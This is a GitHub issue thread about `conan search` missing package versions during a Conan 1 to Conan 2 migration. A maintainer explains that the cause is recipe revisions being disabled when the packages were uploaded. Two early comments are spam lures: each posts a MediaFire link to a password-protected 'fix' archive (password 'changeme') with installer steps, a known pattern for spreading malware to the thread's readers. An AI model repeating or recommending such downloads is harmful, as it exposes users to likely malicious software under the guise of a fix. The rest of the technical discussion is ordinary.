### ISSUE TITLE
[question] Help understand the output of `conan search`

### ISSUE THREAD

**Issue by bomut** [conan-io/conan#16895]
### Background

To coordinate the transition (of a lot (!) of packages) from Conan 1 to Conan 2, we try to write a small application that regularly scans the available Conan packages (binary, library, or Python-only) in our Artifactory remotes and returns whether they still are Conan 1 packages or already migrated to Conan 2.

The current approach works as follows:

- Add and login into all remotes (`remotes.txt` fetched from the build pipelines). 
- Initially, we try to retrieve the list of all packages a remote declares via `conan search '*' -f json`, primarily for faster subsequent package lookups.
- Then we take Lockfiles as input and store their listed packages with full package references: `pkg_name/version@user/channel#rrev:pkg_id#pprev`.
- We perform a lookup to determine which remote(s) declare the packages on the "stripped" package references (`pkg_name/version@user/channel`).
- Download the package & perform the command `conan export ...` to attempt to re-package it. If any errors appears during this exporting step, then the package is not a Conan 2 package.
- Repeat the whole procedure for all packages fortnightly.

### Question regarding `conan search`

To determine from which remote(s) we should attempt the package download from, we perform the lookup of the package reference on the previously stored remote and package mapping.

We discovered that some packages, namely those that have no revisions enabled (rrev and prev are `0`), are not returned by the `conan search` command when it is only searched for the package reference.

See the example below. Package and remote names have been redacted.

<details>

Declared package in the Lockfile:

```json
"10": {
    "ref": "some_pkg_name/5.4.0@internallib/stable#0",
    "package_id": "fa9086fbe479048f400bdb629ae29e1c9d1dd92a",
    "prev": "0",
    "context": "host"
},
```

The `conan search` command executions:

```bash
➜  conan search some_pkg_name
Found 5 pkg/version recipes matching some_pkg_name in some-conan-remote
some-conan-remote
  some_pkg_name
    some_pkg_name/5.2.3@internallib/stable
    some_pkg_name/5.3.0@internallib/stable
    some_pkg_name/5.3.1@internallib/stable
    some_pkg_name/5.3.2@internallib/stable
    some_pkg_name/5.4.2@internallib/stable
some-other-conan-remote
  ERROR: Recipe 'some_pkg_name' not found
```

```bash
➜  conan search some_pkg_name/5.4.0@internallib/stable                                                            
Found 1 pkg/version recipes matching some_pkg_name/5.4.0.0@internallib/stable in some-conan-remote
some-conan-remote
  some_pkg_name
    some_pkg_name/5.4.0@internallib/stable
some-other-conan-remote
  ERROR: Recipe 'some_pkg_name/5.4.0@internallib/stable' not found
```

</details>

So the `conan search` command, by just specifying the package name, returns 5 results, and, in fact, **not** the version specified in the Lockfile. When specifying the full package reference only one result is returned which is the correct package version is returned.

Why is this the case? This means that our remote-to-package-mapping is flawed as it won't contain really all packages a remote holds.

### Further questions

- After some research regarding how the compatible Conan version of a package could be determined, we came up with this rather cumbersome approach. Is there any easier way to determine the Conan 2 compatibility?
  - The Conan 1 and Conan 2 commands should return only packages that are compatible with the respect versions.
- We initially thought that `conan search` when performed in Conan 1 would only return Conan 1 packages and Conan 2 only packages that are compatible with Conan 2. Why is this not the case? In fact, we observed for the `conan search` command that the always the same results are returned. So `conan search` in Conan 2 also returns Conan 1 packages.
- What is the difference between `conan list` and `conan search` in Conan 2? Both commands seem to work identically when searching for packages in remotes.

### Have you read the CONTRIBUTING guide?

- [X] I've read the CONTRIBUTING guide

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by memsharded** [comment]
Hi @bomut 

Thanks for your question.

> To coordinate the transition (of a lot (!) of packages) from Conan 1 to Conan 2, we try to write a small application that regularly scans the available Conan packages (binary, library, or Python-only) in our Artifactory remotes and returns whether they still are Conan 1 packages or already migrated to Conan 2.

My first feedback here would be to focus on "active" packages. Our general recommendation for this is to set-up a parallel CI pipeline for packages with Conan 2, that reports errors, but doesn't block, so everything can keep working. Then, for every job, update a DB with the success/failure, to summarize the status. This has some advantages:
- It is real work that will benefit later, setting the Conan 2 pipeline, etc is something that has to be done anyway, sooner or later
- It is a full, complete test of the recipe and package, not only the ``export``
- The binary packages of Conan 2 do not interfere with the binary packages of Conan 1. They can be uploaded to the same server repository without any problem for Conan 1.X

As some feedback, we did this for ConanCenter, which contains +1500 recipes, several versions for each one, and we are building many different binary configurations for each one.

Regarding your ``conan search`` questions, I am not sure what is happening there. I suspect it could be related to the ``revisions_enabled`` conf. Are you sure that you have revisions enabled everywhere? This is something that cannot be mixed, it won't work well if some clients do not enable revisions, as it will confuse the revision indexing in the server side. 
If every Conan client has revisions enabled, I think this shouldn't happen, can you please confirm this?
(The recommendation to share and distribute config like the conan.conf that activates revisions is using ``conan config install``, are you using it?)

> After some research regarding how the compatible Conan version of a package could be determined, we came up with this rather cumbersome approach. Is there any easier way to determine the Conan 2 compatibility?
The Conan 1 and Conan 2 commands should return only packages that are compatible with the respect versions.

> We initially thought that conan search when performed in Conan 1 would only return Conan 1 packages and Conan 2 only packages that are compatible with Conan 2. Why is this not the case? In fact, we observed for the conan search command that the always the same results are returned. So conan search in Conan 2 also returns Conan 1 packages.

This is totally the case, when we are talking about package binaries, the ``conan list pkg/version:* -r=remote`` in Conan 2 will only list binaries built with Conan 2, and theh ``conan search pkg/version@ -r=remote`` should only list binaries built with Conan 1, even if they are stored in the same server repository. 
But the revisions should be enabled everywhere, and the revisions should match, that is, the recipe should be the same for Conan 1 and Conan 2, which is the recommended approach, to have the same codebase, same recipes for both Conan 1/2, do not diverge them. So the ``conan export/create .`` in Conan 1 and Conan 2 should result in the exact same recipe revision. Can you please check this too? Thanks!

**Comment by bomut** [comment]
Hi @memsharded, as always, thank you for the fast reply 🚀.

The CI pipeline approach is a good idea (and in other scenarios definitely the recommended way), which we unfortunately cannot realize as we do not have access to the individual pipelines. The whole migration endeavor is split into several projects that need to steer the migrations on their own. So all that is left to us is to steer it from the "outside" by inspecting each package individually. We're talking about ~600 *active* packages (from several Lockfiles).

I just double checked that we mixes something up with the revisions setting, but in both, Conan 1 and Conan 2, the same result is returned as stated above in the `<details>` section. I also tried to set the `revisions_enabled` setting (besides the `CONAN_REVISIONS_ENABLED` env variable in Conan 1) in the config in both Conan 1 and Conan 2 scopes, so that should be correct.
So I really suspect that this behavior only happens when package revisions are enabled (which it is by default in Conan 2) and the package that is queried/searched for was uploaded without revisions enabled.

As you wrote, for **binary** packages finding out the Conan 1/2 compatibility is less of a problem, but as I said, we also have a lot of library packages and some other [Python packages](https://docs.conan.io/1/howtos/python_code_reuse.html) (for shared code between recipes) that also need to be syntactically compatible with Conan 2. We explored different approaches to determine their "versions", but really ended up with this rather cumbersome approach (download & export the package) as we cannot simply query packages and "look into" the package to determine whether the package is Conan 2 yet.

**Comment by memsharded** [comment]
> So I really suspect that this behavior only happens when package revisions are enabled (which it is by default in Conan 2) and the package that is queried/searched for was uploaded without revisions enabled.

Yes, I think this is the root cause.
Can you please check in the Artifactory side, for this package, what would be the "recipe revision" order? this should be visible in the UI, but most importantly downloading and sharing the ``index.json`` file that lives in the folder containing all recipe revisions for this package.

**Comment by bomut** [comment]
So after investigating the package in the Artifactory remote, I can confirm that this is a special case where we have 6 different versions of the same package - all holding 2 identical package IDs and package revisions (which are 0).
This leads to the conclusion that the revisions were turned off when the package was created, and only the version was bumped - the package content stayed the same (a folder diff confirmed this).

The `index.json` is almost the same for all 6 packages, (except for the package version and the timestamp of course):
```json
{
  "packageReference" : "some_pkg_name/5.4.0@internallib/stable#0:fa9086fbe479048f400bdb629ae29e1c9d1dd92a",
  "revisions" : [
    {
      "revision" : "0",
      "time" : "2024-08-02T07:43:10.260+0000"
    }
  ]
}
```

However, how can the behavior of the `conan search` command as stated above be explained in this case? `conan search <pkg_name_only>` returns 5 of the 6 total packages, while `conan search <pkg_ref>` returns only 1/6 packages - the one that was not shown in the other command?

**Comment by memsharded** [comment]
The most relevant ``index.json`` file would be the one that is in a parent folder, and looks like:
```
{
  "reference" : "abseil/20230125.3@_/_",
  "revisions" : [ {
    "revision" : "0b0d7fb4e74691fefb0211de8d2e1d86",
    "time" : "2024-08-28T13:43:38.445+0200"
  } ]
}
```
The one that you are showing above is the ``index.json`` for the package revisions, not the recipe revisions, but the one determining the result of ``conan search`` would be first the ``index.json`` for the recipe revisions.

Can you please check that for the different versions of the package?

**Comment by bomut** [comment]
I can confirm, the "revision" field is "0" for all `index.json` files - for the topmost package file, *as well* as the for the `index.json` files under the package ids (folders).

**Comment by memsharded** [comment]
> I can confirm, the "revision" field is "0" for all index.json files - for the topmost package file, as well as the for the index.json files under the package ids (folders).

Ok, that would explain the behavior, it seems that revisions are not properly enabled in all clients, and that is causing the issues. Activating revisions in all clients and uploading the real non-zero revisions to the servers should solve the issues.

**Comment by bomut** [comment]
Thanks for clarifying @memsharded. I'm marking this issue as resolved. Thanks for the support!

**Comment by memsharded** [comment]
Thanks very much for all the feedback!
